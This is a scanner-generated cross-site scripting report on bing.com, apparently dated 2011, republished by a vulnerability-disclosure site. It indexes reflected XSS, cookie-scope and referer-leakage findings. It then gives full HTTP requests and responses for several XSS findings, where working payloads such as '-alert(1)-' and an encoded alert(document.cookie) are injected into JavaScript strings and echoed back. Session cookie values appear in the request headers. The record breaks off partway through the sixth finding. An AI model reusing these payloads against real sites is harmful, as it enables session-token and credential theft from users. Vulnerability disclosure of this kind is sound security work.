bing.com, XSS, REST 205, Cross Site Scripting, CWE-79

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Feb 13 07:57:11 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js [REST URL parameter 2]

1.2. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js [REST URL parameter 3]

1.3. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js [REST URL parameter 4]

1.4. http://www.bing.com/local/aa461'-alert(&/ [REST URL parameter 2]

1.5. http://www.bing.com/local/aa461'-alert(&/ [REST URL parameter 2]

1.6. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js [REST URL parameter 2]

1.7. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js [REST URL parameter 2]

1.8. http://www.bing.com/local/assetgeneration.handler/ [REST URL parameter 2]

1.9. http://www.bing.com/local/assets/img/sprites/amenities.png [REST URL parameter 2]

1.10. http://www.bing.com/local/assets/img/sprites/amenities.png [REST URL parameter 3]

1.11. http://www.bing.com/local/assets/img/sprites/amenities.png [REST URL parameter 4]

1.12. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 2]

1.13. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 3]

1.14. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 4]

1.15. http://www.bing.com/local/us/co/colorado%20springs/ [REST URL parameter 2]

1.16. http://www.bing.com/local/us/co/colorado%20springs/ [REST URL parameter 3]

1.17. http://www.bing.com/local/us/co/colorado%20springs/ [REST URL parameter 4]

1.18. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 2]

1.19. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 3]

1.20. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 4]

1.21. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 5]

1.22. http://www.bing.com/local/ypdefault.aspx [REST URL parameter 2]

2. Cookie scoped to parent domain

2.1. http://www.bing.com/travel/

2.2. http://www.bing.com/travel/deals/cheap-flights-to-los-angeles.do

2.3. http://www.bing.com/travel/deals/weekend-deals-flight-deals.do

2.4. http://www.bing.com/travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502

2.5. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

2.6. http://www.bing.com/

2.7. http://www.bing.com/browse

2.8. http://www.bing.com/events/search

2.9. http://www.bing.com/images/results.aspx

2.10. http://www.bing.com/local

2.11. http://www.bing.com/local/ypdefault.aspx

2.12. http://www.bing.com/maps/

2.13. http://www.bing.com/maps/default.aspx

2.14. http://www.bing.com/maps/explore/

2.15. http://www.bing.com/news/results.aspx

2.16. http://www.bing.com/news/search

2.17. http://www.bing.com/results.aspx

2.18. http://www.bing.com/search

2.19. http://www.bing.com/settings.aspx

2.20. http://www.bing.com/shopping

2.21. http://www.bing.com/shopping/binoculars/c/4378

2.22. http://www.bing.com/shopping/classic-womens-fragrances/r/162

2.23. http://www.bing.com/shopping/pet-litter-supplies/c/6874

2.24. http://www.bing.com/travel

2.25. http://www.bing.com/travel/content/search

2.26. http://www.bing.com/videos/browse

2.27. http://www.bing.com/videos/results.aspx

2.28. http://www.bing.com/videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

2.29. http://www.bing.com/videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

2.30. http://www.bing.com/videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

2.31. http://www.bing.com/videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

2.32. http://www.bing.com/videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

2.33. http://www.bing.com/videos/watch/video/tip-stress-and-love/1revqyosz

3. Cookie without HttpOnly flag set

3.1. http://www.bing.com/travel/

3.2. http://www.bing.com/travel/content/search

3.3. http://www.bing.com/travel/deals/cheap-flights-to-los-angeles.do

3.4. http://www.bing.com/travel/deals/weekend-deals-flight-deals.do

3.5. http://www.bing.com/travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502

3.6. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

3.7. http://www.bing.com/

3.8. http://www.bing.com/browse

3.9. http://www.bing.com/events/search

3.10. http://www.bing.com/images/results.aspx

3.11. http://www.bing.com/local

3.12. http://www.bing.com/local/

3.13. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

3.14. http://www.bing.com/local/aa461'-alert(&/

3.15. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js

3.16. http://www.bing.com/local/us/co/colorado%20springs/

3.17. http://www.bing.com/local/us/dc/washington/restaurants/

3.18. http://www.bing.com/local/ypdefault.aspx

3.19. http://www.bing.com/maps/

3.20. http://www.bing.com/maps/default.aspx

3.21. http://www.bing.com/maps/explore/

3.22. http://www.bing.com/news/results.aspx

3.23. http://www.bing.com/news/search

3.24. http://www.bing.com/results.aspx

3.25. http://www.bing.com/search

3.26. http://www.bing.com/settings.aspx

3.27. http://www.bing.com/shopping

3.28. http://www.bing.com/shopping/binoculars/c/4378

3.29. http://www.bing.com/shopping/classic-womens-fragrances/r/162

3.30. http://www.bing.com/shopping/pet-litter-supplies/c/6874

3.31. http://www.bing.com/travel

3.32. http://www.bing.com/videos/browse

3.33. http://www.bing.com/videos/results.aspx

3.34. http://www.bing.com/videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

3.35. http://www.bing.com/videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

3.36. http://www.bing.com/videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

3.37. http://www.bing.com/videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

3.38. http://www.bing.com/videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

3.39. http://www.bing.com/videos/watch/video/tip-stress-and-love/1revqyosz

4. Referer-dependent response

5. Cross-domain Referer leakage

5.1. http://www.bing.com/fd/fb/mulmfg

5.2. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

5.3. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js

5.4. http://www.bing.com/local/details.aspx

5.5. http://www.bing.com/local/locationselector.aspx

5.6. http://www.bing.com/local/us/co/colorado%20springs/

5.7. http://www.bing.com/local/us/dc/washington/restaurants/

5.8. http://www.bing.com/settings.aspx

6. Cross-domain script include

6.1. http://www.bing.com/shopping/classic-womens-fragrances/r/162

6.2. http://www.bing.com/travel/

6.3. http://www.bing.com/videos/browse

6.4. http://www.bing.com/videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

6.5. http://www.bing.com/videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

6.6. http://www.bing.com/videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

6.7. http://www.bing.com/videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

6.8. http://www.bing.com/videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

6.9. http://www.bing.com/videos/watch/video/tip-stress-and-love/1revqyosz



1. Cross-site scripting (reflected)  next
There are 22 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3421'-alert(1)-'a961c250743 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=c526f25b683646b0910ff5ac25d07821; CID=95b279dd4f1844138addbc4ad35c551f; CDate=2/11/2011 9:57:30 PM; VE_LSV=cache=0; BID=d7781a329a2d4c02b31be68005082050; CID=27f7f15a19694227a010ba5f0f214766; CDate=2/11/2011 9:57:03 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=B2A342B12569439BB802AD1A15D8A30B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 43fff0538eb64dfba44b7d2f523409d2
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState:
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001206
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:09:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js
Content-Length: 17845


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
ive.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js';</script>
...[SNIP]...

1.2. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c84f'-alert(1)-'139e0b9752f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined8c84f'-alert(1)-'139e0b9752f/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=c526f25b683646b0910ff5ac25d07821; CID=95b279dd4f1844138addbc4ad35c551f; CDate=2/11/2011 9:57:30 PM; VE_LSV=cache=0; BID=d7781a329a2d4c02b31be68005082050; CID=27f7f15a19694227a010ba5f0f214766; CDate=2/11/2011 9:57:03 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=B2A342B12569439BB802AD1A15D8A30B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 54e7a338f8b44685b153335ef9ec6444
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState:
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:10:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined8c84f'-alert(1)-'139e0b9752f/js
Content-Length: 17845


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
calsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined8c84f'-alert(1)-'139e0b9752f/js';</script>
...[SNIP]...

1.3. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js/LSV.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9dec8'-alert(1)-'448f3b6507a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js9dec8'-alert(1)-'448f3b6507a/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=c526f25b683646b0910ff5ac25d07821; CID=95b279dd4f1844138addbc4ad35c551f; CDate=2/11/2011 9:57:30 PM; VE_LSV=cache=0; BID=d7781a329a2d4c02b31be68005082050; CID=27f7f15a19694227a010ba5f0f214766; CDate=2/11/2011 9:57:03 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=B2A342B12569439BB802AD1A15D8A30B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 7d42712fefeb46a98ab737e52fe7dfff
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState:
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001209
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:11:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js9dec8'-alert(1)-'448f3b6507a
Content-Length: 17840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
search';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887b/undefined/js9dec8'-alert(1)-'448f3b6507a';</script>
...[SNIP]...

1.4. http://www.bing.com/local/aa461'-alert(&/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c2ac'-alert(1)-'f9f092c6a82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/2c2ac'-alert(1)-'f9f092c6a82&/ HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://burp/show/24
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _HOP=I=1&TS=1297461512; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 5fb4a35222b54432bd70cffed70a2abc
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001204
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:09:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/2c2ac'-alert(1)-'f9f092c6a82&
Set-Cookie: _HOP=; domain=.bing.com; path=/
Content-Length: 17294


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
e=or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/2c2ac'-alert(1)-'f9f092c6a82&';</script>
...[SNIP]...

1.5. http://www.bing.com/local/aa461'-alert(&/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 815d0(a)ba9b933b7e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/aa461'-alert(815d0(a)ba9b933b7e5&/ HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://burp/show/24
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _HOP=I=1&TS=1297461512; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 95df9438b2614df9963f6f63f445308b
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState:
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001201
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:09:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(815d0(a)ba9b933b7e5&
Set-Cookie: _HOP=; domain=.bing.com; path=/
Content-Length: 16855


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
cation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/aa461'-alert(815d0(a)ba9b933b7e5&';</script>
...[SNIP]...

1.6. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/undefined/js/LSV.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9bd9'-alert(1)-'44a4f985b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/e9bd9'-alert(1)-'44a4f985b0&/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(&/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VE_LSV=cache=0; BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: a467f92137f1454a84f3da60fb3eb3d1
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:09:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/e9bd9'-alert(1)-'44a4f985b0&/undefined/js
Content-Length: 17646


